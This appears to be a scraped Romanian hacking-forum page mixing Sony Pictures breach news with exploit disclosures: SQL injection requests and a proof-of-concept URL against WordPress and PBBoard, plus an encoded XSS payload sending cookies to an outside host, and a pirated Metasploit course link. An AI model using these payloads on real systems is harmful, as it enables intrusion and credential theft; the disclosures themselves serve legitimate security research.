Aerosol

vreau si eu, te rog

Nu mai veniti ba sa cereti programe de genul aici, NU O SA GASITI si NU O SA PRIMITI. Toti pe stricat...

ar putea fi MAGIE , AR PUTEA FI dar sa fim seriosi noi nu mai credem in asta. Look at my eyes

a luptat pentru ca noi sa traim azi si extrem de usor a fost uitat... RUSINE Romania.

1. Da 4. SIGUR 5. Da 6. posibil

trebuie sa faca si ei spam, no? macar a ales sa faca spam cu femei

hai noroc si bine ai venit.

Fratilor, poti sa fi tu cel mai curat om, daca ei te vor jos apai acolo ajungi, gasesc ei cateva rahaturi si te baga la problema. Nimic nu s-a schimbat militia a ramas aceasi doar ca acum se numeste politie, e ca pe vremuri si va fi din ce in ce mai rau.

The security breach suffered by Sony Pictures Entertainment last month appears to have leaked far more personal information than previously believed, revealing the US Social Security numbers of more than 47,000 celebrities, freelancers, and current and former Sony employees. An analysis of 33,000 leaked Sony Pictures documents by data security software firm Identity Finder showed that the leaked files included the personal information, salaries and home addresses for employees and freelancers who worked at the studio. Some of the celebrities include Sylvester Stallone, director Judd Apatow and Australian actress Rebel Wilson, according to the Wall Street Journal, which first reported on the analysis. Other data identified as leaked to file-sharing networks after the breach include contracts, termination dates, termination reason, and other sensitive information, nearly all of which was stored in Microsoft Excel files without password protection, said Identity Finder CEO Todd Feinman. Sony Pictures representatives did not respond to a request for comment. The leak highlights the risk posed to large companies and organizations that store customer and employee information on computers attached to the Internet, Feinman said. "This is a common theme of corporations today," Feinman told CNET, ticking off a list of recent security breach victims including Target, Home Depot and PF Changs. "They think they are protected by firewalls and perimeter security, but the border is becoming blurred, and attacks get through." Identity Finder said it discovered in the files more than 1.1 million Social Security numbers, the US system for tracking a person's tax and social welfare, but that many were duplicates. Sony Entertainment co-chair Amy Pascal's SSN was found in 104 separate locations, while Sony Entertainment CEO Michael Lynton's was found in 93 files. The discovery of multiple copies of data this sensitive on multiple employees' computers or multiple times on a single employee's computer is unusual and dramatically raises a company's security risk, Feinman said. "When you have multiple copies of this data, you are giving hackers multiple opportunities to steal sensitive information when they get through," he said. "If Sony had reduced its sensitive data footprint by reducing the number of copies of data and reducing the number of employees with access to the data, we would have seen zero or only one file." The revelation amplifies the damage caused by the hack, which forced the film and TV arm of Japanese tech and media conglomerate Sony to shut down its network for more than a week. A hacking group calling itself Guardians of Peace claimed last week to have obtained Sony Pictures' internal data, including its "secrets," and said it would release the data to the public if its demands were not met, according to reports. It is unclear what the hacker group demanded. Following this declaration, packs of files allegedly belonging to Sony Pictures found their way online. Data including passwords, Outlook mailboxes, personal employee data and copies of passports belonging to both actors and crews working on film projects have been released. Several days later, Sony Pictures films not yet officially released were leaked online, including the movies "Still Alice," "Annie," "Mr. Turner" and "To Write Love On Her Arms." Since the November 24 attack on Sony's network, investigators have been working to determine who was behind the hack. Sony is working with FireEye's Mandiant forensic team to investigate the breach, along with the FBI, which issued a warning earlier this week that hackers are using malware to launch destructive attacks against businesses in the US. The company is said to suspect that hackers working on behalf of North Korea were behind the attack, according to Recode. The site speculated that the attack may be in response to Sony's forthcoming film "The Interview," a comedy due to be released next month starring Seth Rogen and James Franco as TV journalists who become embroiled in a plot to assassinate North Korean leader Kim Jong-Un. Source

It's Friday! By later this afternoon you'll be working at half-pace and contemplating weekend fun. Unless you run VMware's vCenter control freak, because Virtzilla has just revealed a nasty cross-site scripting flaw in the product. “VMware vCenter Server Appliance (vCSA) contains a vulnerability that may allow for Cross Site Scripting. Exploitation of this vulnerability in vCenter Server requires tricking a user to click on a malicious link or to open a malicious web page while they are logged in into vCenter,” says VMware's advisory, issued late on Thursday US time. Another newly-identified issue, one of six revealed here, means “vCenter Server does not properly validate the presented certificate when establishing a connection to a CIM Server residing on an ESXi host.” That makes Man-in-the-middle attacks against the CIM service possible. Virtzilla's other patches look less worrying as they address small issues and third-party code on which VMware products depend. The good news is that while there are patches coming for some of the problems, the first two can be sorted with updates to vCenter Server. Only vCenter 5.1 needs the update for the XSS bug, but all versions from 5.0 to 5.5 need attention for the certificate mess. Rushed update implementations aren't any fun, but if VMware says your production systems need them – on Friday – who are you to disagree? Source

totusi frate e vorba de o firma importanta cum sa ti toate parolele intr-un fisier numit "PASSWORD" adica totusi frate, e ca si cum ai tine un banner pe site-ul tau cu "parola e 1234"

It's been a rough week for Sony execs (million-dollar salaries notwithstanding). And things are only going to get worse. Which would almost be enough to make you feel bad for the poor schmucks in IT—that is, until you realize that they hid their most sensitive password data under the label "Passwords." Go ahead and slam your head against something hard. We'll wait. The second trove of data snuck out sometime yesterday, and it didn't take long for Buzzfeed to stumble upon the Facebook, MySpace (an ancient form of Facebook), YouTube, and Twitter "usernames and passwords for major motion picture social accounts." Likely due to the fact that they were saved in a huge file called "Password." Which contained even more passwords called things like "Facebook login password." So they would know that that was the password. Because who needs encryption or security or common sense or even the vaguest attempt at grade-school level online safety. Yep, "Password" should do just fine. Maybe stick a "1" on the end. That'll throw 'em off. Of course and unfortunately, it shouldn't really be a surprise that humans are lazy and unimaginative and just generally the worst when it comes to protecting our precious online data. And yet—goddammit, Sony IT. You had one job. [Fusion, Buzzfeed] Source

Vulnerability title: SQL Injection in PBBoard CMS CVE: CVE-2014-9215 CMS: PBBoard Vendor: Power bulletin board - http://www.pbboard.info/ Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download Affected version: Version 3.0.1 (updated on 13/09/2014) and before. Fixed version: Version 3.0.1 (updated on 28/11/2014) Google dork: intext:Powered By PBBoard Reported by: Tran Dinh Tien - tien.d.tran@itas.vn Credits to ITAS Team - www.itas.vn :: DESCRITION :: Multiple SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection. :: DETAILS :: Attack vector Link 1: POST /index.php?page=register&checkemail=1 HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target.org/index.php?page=register&index=1&agree=1 Content-Length: 29 Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache email=<SQL Injection Here>&ajax=1 Link 2: POST /index.php?page=forget&start=1 HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.org/index.php?page=forget&index=1 Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 52 code=0ae4e&email=<SQL Injection Here>&submit_forget=Save link 3: POST /index.php?page=forget&send_active_code=1 HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.org/index.php?page=forget&active_member=1&send_active_code=1 Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 57 code=13709&email=<SQL Injection Here>&submit_active_code=Save :: CODE DETAIL :: - Vulnerable parameter: email - Vulnerable file: includes/functions.class.php - Vulnerable function: CheckEmail($email) - Vulnerable code: function CheckEmail($email) { return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false; } - Fix code: function CheckEmail($email) { // First, we check that there's one @ symbol, and that the lengths are right if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) { // Email invalid because wrong number of characters in one section, or wrong number of @ symbols. return false; } if @strstr($email,'/')) { return false; } // Split it into sections to make life easier $email_array = explode("@", $email); $local_array = explode(".", $email_array[0]); for ($i = 0; $i < sizeof($local_array); $i++) { if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) { return false; } } if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) { // Check if domain is IP. If not, it should be valid domain name $domain_array = explode(".", $email_array[1]); if (sizeof($domain_array) < 2) { return false; // Not enough parts to domain } for ($i = 0; $i < sizeof($domain_array); $i++) { if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) { return false; } } } return true; } :: SOLUTION :: Version 3.0.1 (updated on 28/11/2014) :: DISCLOSURE :: - 11/27/2014: Inform the vendor - 11/28/2014: Vendor confirmed - 11/28/2014: Vendor releases patch - 12/01/2014: ITAS Team publishes information ::COPYRIGHT:: Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP ([url]www.itas.vn[/url]). :: REFERENCE :: - [url]http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html[/url] - [url]https://www.youtube.com/watch?v=AQiGvH5xrJg[/url] Source

Here source Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection Data : 2014 – 12 -03 Exploit Author : Securely (Yoo Hee man) Plugin : google-document-embedder Fixed version : N/A Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip 1. Detail - Google Document Embedder v2.5.14 have SQL Injection - This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection. - but mysql_real_escape_string() function is bypass possible - vulnerability file : /google-document-embedder/~view.php ================================================================ 50 // get profile 51 if ( isset( $_GET['gpid'] ) ) { 52 $gpid = mysql_real_escape_string( $_GET['gpid'] ); //mysql_real_escape_string() is bypass 53 if ( $profile = gde_get_profile( $gpid ) ) { 54 $tb = $profile['tb_flags']; 55 $vw = $profile['vw_flags']; 56 $bg = $profile['vw_bgcolor']; 57 $css = $profile['vw_css']; 58 } 59 } ================================================================ =============================================================== 373 function gde_get_profile( $id ) { 374 global $wpdb; 375 $table = $wpdb->prefix . 'gde_profiles'; 376 377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A ); 378 $profile = unserialize($profile[0]['profile_data']); 379 380 if ( is_array($profile) ) { 381 return $profile; 382 } else { 383 return false; 384 } 385 } ================================================================ 2. POC http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1 3. Solution: Not patched 4. Discovered By : Securely(Yoo Hee man) God2zuzu@naver.com

Proof of concept code that demonstrates an ASLR bypass of PIE compiled 64bit Linux. Download

PS4 clar

On November 24 the world found out that Sony Pictures Entertainment was hacked and had disabled its entire corporate network, including locations that spanned Culver City, New York, and overseas. This breach has very few analogues in history, outside of the Snowden documents, to any other type of breach on record. The combined corporate intellectual property, financial and legal information, contact databases and health records, passwords and encryption keys for Sony Pictures Entertainment can’t be compared to a breach of a retailer’s email or credit card database. Home Depot said that 53 million email addresses were swiped in its recent data breach, where 56 million credit card accounts were also compromised. But in the case of Sony’s compromise, individual files can be spreadsheets with multiple records each. Some of the 38 million (known) files exfiltrated in this carefully planned attack are entire databases. This is comparative to source code being leaked. Unpublished scripts for movies, contract negotiations, NDA’s (thousands are listed), secret terms for payment schemes, the very information Sony uses to keep its entire company relevant, are in the stolen files. The benefits to Sony Pictures Entertainment competitors — Universal, Warner, Disney — in terms of competitive intel, is priceless. The hacking crew taking claim for popping one of the world’s largest film and entertainment companies identified themselves as #GOP (“Guardians of Peace”). News of the compromise emerged when a friend of a Sony employee posted to Reddit an image seen by anyone trying to log in on Sony Entertainment employee computers Monday morning. The image loaded onto every Sony Pictures employee’s computer when anyone attempted to log in was a very cheesy, grinning, sinister skeleton that threatened Sony, saying that unless GOP’s requests were met, GOP would release all of Sony’s ‘secrets’ to the world. After reporting the story, security column Salted Hash received a second image in which GOP threatened to release all of Sony’s data if any attempt was made to find GOP. Sony Pictures spokeswoman Jean Guerin said in a brief statement that the network was experiencing “a system disruption” and that technicians are “working diligently to resolve”. That Monday evening, GOP followed through by publishing a gigantic text file that listed what GOP said was every file in its possession: approximately 38 million file names. What’s named in that file list should have been enough to make everyone sit down and shut up about whether or not this hack was serious, or real. Salted Hash reported, “GOP says they’ve accessed private key files; source code files (CPP), password files (including passwords for Oracle and SQL databases), inventory lists for hardware and other assets, production outlines and templates, as well as production schedules and notes.” The file hit Reddit, and commenters noted they’d found over 9,000 passport scans listed in the file (including Angelina Jolie, Daniel Craig and Cameron Diaz). There are over 3,800 files named ‘password.’ If you’ve ever worked with, or even tangentially for, Sony Pictures Entertainment, this crew and anyone who gets ahold of these files have all of your personal information, your private information, and anything else Sony touched. There are filenames listing over 8,000 non-disclosure agreements (NDA’s), and over 6,000 files named MPAA. There are files with Pirate Bay in the title, as well as MEGA (Megaupload). Some file names are specific, like the ‘MPAA piracy project lunch receipt’ filename. Financials on pirated media losses dating back as far as 2006. One Redditor found the file for his Imageworks letter of resignation, dating back to 2005. Basically, if you’ve ever had a tangle with Sony Pictures, or Sony Entertainment ever thought about putting you in its legal crosshairs you’re in there, too. GOP left an interesting clue in its communication with media outlets after this release; this hacking crew appears to welcome press inquiries, though we can only hope the journos emailing GOP have half a clue about operational security. We may very well find out exactly what ‘Lena’ means. Monday night’s massive file list includes filenames of security audits and reports, and documentation of penetration tests performed by external companies. No doubt, in those files would be any recommendations made to SPE on its information and physical security practices. Sony only hired its first CISO in 2011, after the PlayStation Network was massively hacked (former gov cyberdude Philip R. Reitinger, formerly DHS, Microsoft, DoD and DoJ). He left Sony to start a consulting company in 2014 — a company whose online presence died off right around the time Sony filled his position by hiring from within, promoting its own director of security engineering, John Scimone, just last September. On November 30 Sony hired security firm FireEye’s Mandiant for incident response (and the FBI’s participation in an investigation became official). Hiring Mandiant is smart, because they’re the most popular girls in school when it comes to incident response, if not also well-known for scary OMG-the-APTs-are-coming dire warning research papers. But bringing in Mandiant is also disheartening — in light of the fact that SPE never really got its act together to hire and retain IT security staff. Currently, Sony infosec job listings sit unfilled on job boards, some over 30 days old, others since June. Also that weekend, Salted Hash reported GOP had “published sales and contract data from Sony Pictures Television, taken after the group compromised the entertainment giant’s network last week. The 894MB archive contains thousands of items, covering a period between 2008 and 2012.” Partial Release GOP published its second big weapon on Monday, December 1: A massive ‘partial release‘ of multiple compressed files containing more files, posted to Pastebin, several torrent sites and Reddit (among other websites). There’s no doubt that its contents will severely impact Sony Pictures Entertainment and its employees (and contractors) indefinitely — but reporting on the gravity and severity of this release has been curiously eclipsed by a rumor. On November 28, Re/code pulled a Zoolander-does-infosec-reporting move when the silver spoon tech media outlet claimed an insider told them “Sony and outside security consultants are actively exploring the theory that the hack may have been carried out by third parties operating out of China on North Korea’s behalf.” (Mandiant was announced as Sony’s incident response team November 30.) This unsubstantiated claim was picked up and reported at face value in headlines by Forbes, NPR, Guardian, NBC, ABC, CBS and many more. But the rumor was angrily blasted as irresponsible and unlikely by many in the infosec communities. The data drop is huge: 25GB’s — compressed. No one has yet reported the full size of all told in the release, which is supposedly a fraction of what GOP is holding. Needless to say, the drop contains piles and piles of Sony IP. The employee handbook. Leave of absence records. Salaries and financials, and a plethora of sensitive internal documentation. It also contains employee and contractor records, social security number files, a listing of over 30,000 HR documents, criminal background checks, even employee badge photos. For these employees, this is unbelievably awful. They are no longer safe, and they can expect the hardships of identity theft to screw up their lives for some time to come, and the lives of their families. We can only hope Sony tells its employees how much personal risk they currently face. This release has been publicly accessible for two days, and while the first Pastebin page was removed, the page’s Google Cache was shared widely — it was on Reddit, for example. GOP also emailed a 1.15GB subset of the files to its media correspondents, additionally publishing a list of what it sent to press on Pastebin. This data dump is just starting to be combed over and unpacked by media, online forums, and anyone else who gets their hands on it. GOP wrote on Pastebin that the large data dump is, And it’s in the hands of people who have more files like this, and who named that file’s password ‘diesony123?. The same day this file hit the torrent sites, Sony Pictures told Hollywood media site Deadline that its networks were back online in an exclusive statement, which Sony tastelessly combined with a plug for one of its upcoming films. So, how exactly do you steal an amount of data so big it’s comparative in size to all the books in the U.S. Library of Congress? This is a heist, plain and simple — but this was no simple plan. Exfiltrating ‘tens of terabytes’ takes planning. GOP has told media it had an insider working on this heist for a year, and I think we have every reason to believe this. If Sony Pictures Entertainment made a movie about this attack, we’d all think it was the usual made up Hollywood ‘cyberwar’ fantasy… and ridicule it like we do the TV show “Scorpion.” Source

@CristianRoflmao Sunt doar 3 pasi:

l-am folosit, multumesc.

Omule tu esti incredibil de... NU AI SPART NICI-O PAROLA scrie clar ca nu e securizat (nu are parola) pana acum intrai din virtualbox acum intri cu live-CD (nici tu nu mai stii cat ai mintit) si pentru numele lui Dumnezeu KALI LINUX nu linux kali... Inceteaza sa mai postezi aiurea nu faci nimic deca sa te faci de ras. Gandeste de 2 ori inainte sa postezi ceva.

@Bratuleanu123 inceteaza sa faci offtopic Bratuleanu Hacker Anonymous ))) ai wallpaper cu linux kali, ha ha ha ha ha ce e cu poza View image: untitled asta? o.O aia inspre care arata sageata NU are parola...

Udemy - Metasploit Extreme on Kali Linux English .MP4 Audio: aac, 44100 Hz, stereo Video: h264, yuv420p, 642x360, 30.00 fps® 347 MB Download Pass: onevatan.com

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: WordPress plugin cm-download-manager Plugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url] Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url] Vulnerability Type: CWE-79: Cross-site scripting Vulnerable Versions: 2.0.6 and below Fixed Version: 2.0.7 Solution Status: Fixed by Vendor Vendor Notification: 2014-11-27 Public Disclosure: 2014-12-02 CVE Reference: N/A. Only assigned for CSRF Criticality: Low Vulnerability details: CM Download Manager plugin for WordPress contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the /wp-admin/admin.php script does not validate input to the 'addons_title' POST parameter before returning it to users. This allows an authenticated remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Root cause: The software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to authenticated users. Proof-of-concept: Insert following code to CM Downloads -> Settings -> "Downloads listing title" field with CSRF attack. <script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62);document.write(foo);</script> - --------------- Product: WordPress plugin cm-download-manager Plugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url] Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url] Vulnerability Type: CWE-352: Cross-Site Request Forgery Vulnerable Versions: 2.0.6 and below Fixed Version: 2.0.7 Solution Status: Fixed by Vendor Vendor Notification: 2014-11-27 Public Disclosure: 2014-12-02 CVE Reference: CVE-2014-9129 Criticality: Low Vulnerability details: CM Download Manager plugin for WordPress contains a flaw on the CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not require multiple steps, explicit confirmation, or a unique token when performing sensitive actions. By tricking authenticated user into following a specially crafted link, a context-dependent attacker can perform a CSRF attack causing the victim to insert and execute arbitrary script code. Root cause: The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. Proof-of-concept: <html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3> <form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings"> <table><input type="text" name="addons_title" value="XSS"></table></form> <script type="text/javascript">document.getElementById("f1").submit();</script> </body></html> Notes: Other pages and/or parameters are also possibly insecure (not tested). Suggested to do a proper security audit for their software. Vendor did not mention security fix or CVE in ChangeLog even it was discussed several times. References below. Cross-site scripting: [url=http://cwe.mitre.org/data/definitions/79.html]CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (2.8)[/url] [url]https://scapsync.com/cwe/CWE-79[/url] [url]https://en.wikipedia.org/wiki/Cross-site_scripting[/url] Cross-Site Request Forgery: [url=http://cwe.mitre.org/data/definitions/352.html]CWE - CWE-352: Cross-Site Request Forgery (CSRF) (2.8)[/url] [url]https://scapsync.com/cwe/CWE-352[/url] [url]https://en.wikipedia.org/wiki/Cross-site_request_forgery[/url] - --- Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/ l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT =bUVi -----END PGP SIGNATURE----- Source

The FBI has warned that hackers have used malware to launch destructive attacks against businesses in the United States, following a devastating attack on the networks of Sony Pictures Entertainment. In a five-page confidential "flash" warning sent to businesses late Monday and seen by Reuters, the FBI provided technical details about the malware, but did not mention the corporate victim by name. According to the advisory, the malware is particularly violent -- overwriting data on hard drives to make them little more than bricks while also closing down networks. While it is likely the malware in question is linked to the Sony hack -- considering the timing of the issued warning -- an FBI spokesman declined to comment on the advisory. If this malware was used in the Sony security breach, the recovery process is likely to be costly and time consuming. Last week, reports emerged that noted Sony Pictures' websites and a number of Twitter feeds had been temporarily taken over. At the same time, employees of Sony's entertainment arm logged in to their systems to discover a message left by a hacking group -- or an individual -- which identified themselves as "#GOP" -- Guardians of Peace. The message left on Sony Pictures' internal network made demands of the company, promising to release "secrets" if the demands were not met. Following this declaration, packs of files allegedly belonging to Sony Pictures found their way online. Data including passwords, Outlook mailboxes, personal employee data and copies of passports belonging to both actors and crews working on film projects have been released. Several days later, Sony Pictures films not yet officially released were leaked, including the titles "Fury," "Still Alice," "Annie," "Mr. Turner" and "To Write Love On Her Arms." According to reports, Sony Pictures has been forced to bring in FireEye's Mandiant forensic team to investigate the breach and to act as clean-up crew. The FBI is also investigating the cyberattack. A Sony spokesperson said the "theft of Sony Pictures Entertainment content is a criminal matter, and we are working closely with law enforcement to address it." As reports tentatively linked the cyberattack against Sony Pictures to the release of a film about North Korea's leader Kim Jong-un, the country's officials responded in a rather cryptic manner. Speaking to the BBC, when asked whether North Korea was responsible for the attack, a spokesman for the North Korean government said "Wait and see." The film in question, "The Interview," is about two reporters who are enlisted by the CIA to assassinate Kim Jong-un. Earlier this year, North Korea complained about the film to the United Nations and branded the movie an "undisguised sponsoring of terrorism." This story originally appeared at ZDNet under the headline "FBI warns of 'destructive' malware following Sony hack." Source

Twitter has announced changes making it easier for users to block offensive content and malicious tweets. The firm said that the changes, which will come in a staged rollout, are part of a number of updates designed to simplify the user experience, and prevent "in-product harassment", or trolling. The move could also provide some confidence in Twitter as it courts the enterprise market. Twitter said in a blog post that the feature could be used by victims or witnesses of abusive posts. "In our continuing effort to make your Twitter experience safer, we're enhancing our in-product harassment reporting and making improvements to ‘Block'," said Twitter director of user safety, Shreyas Doshi. "These enhancements similarly improve the reporting process for those who observe abuse but aren't receiving it directly. "And to enable faster response times, we've made the first of several behind-the-scenes improvements to the tools and processes that help us review reported tweets and accounts." A new section of the Settings page allows Twitter users to review and manage the accounts that they have blocked. Doshi added that the blocked accounts will not be able to view the user's profile. Twitter said that it has also made some back-end changes which will allow it to deal with reports of abuse and harassment more quickly. "These enhancements similarly improve the reporting process for those who observe abuse but aren't receiving it directly," Doshi said. The update is starting with a small subset of users, and will be rolled out more widely over time. Caroline Criado-Perez, a British journalist and feminism campaigner who faced abuse on Twitter last year after pushing to have Jane Austen’s face on the £10 note, has praised Twitter's latest move. Source